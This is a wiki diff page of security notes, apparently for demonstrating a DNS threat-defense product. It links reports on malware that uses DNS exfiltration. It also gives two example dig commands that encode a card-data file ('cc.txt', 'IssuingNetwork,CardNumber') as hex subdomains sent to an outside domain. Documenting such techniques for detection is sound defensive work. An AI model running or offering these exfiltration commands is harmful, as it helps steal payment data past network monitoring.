Saucepan

User Tools

Site Tools

Trace:
infoblox_threat_defense:exfiltration

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

infoblox_threat_defense:exfiltration [2024/12/27 15:09] – created bstaffordinfoblox_threat_defense:exfiltration [2024/12/27 15:22] (current) bstafford
Line 1: Line 1:
 +====== Malware Examples using DNS ======
 +  * [[https://unit42.paloaltonetworks.com/xhunt-campaign-backdoors/|Snugy Malware]] - 2020 November - Low and Slow DNS Exfiltration and C2.
 +  * [[https://www.bitdefender.com/blog/businessinsights/unpacking-bellaciao-a-closer-look-at-irans-latest-malware/|BellaCiao]] - 2023 April - Low and Slow DNS Exfiltration and C2.
 +  * [[https://cyberscoop.com/fbi-disrupts-russian-cyber-espionage-tool|Medusa]] - 2023 May - Russian Malware [[https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF|Intel Report]]
 +
 +===== Example =====
 +
 <code>dig +short 10.181.64.161 1075.63632e747874.1.bz2oc0.txt.start.hexn.ebb569d085.thehansfamily.com <code>dig +short 10.181.64.161 1075.63632e747874.1.bz2oc0.txt.start.hexn.ebb569d085.thehansfamily.com
 dig +short 10.181.64.161 1.49737375696e674e6574776f726b2c436172644e756d6265720d0a.bz2oc0.hexn.ebb569d085.thehansfamily.com dig +short 10.181.64.161 1.49737375696e674e6574776f726b2c436172644e756d6265720d0a.bz2oc0.hexn.ebb569d085.thehansfamily.com
infoblox_threat_defense/exfiltration.1735312178.txt.gz · Last modified: by bstafford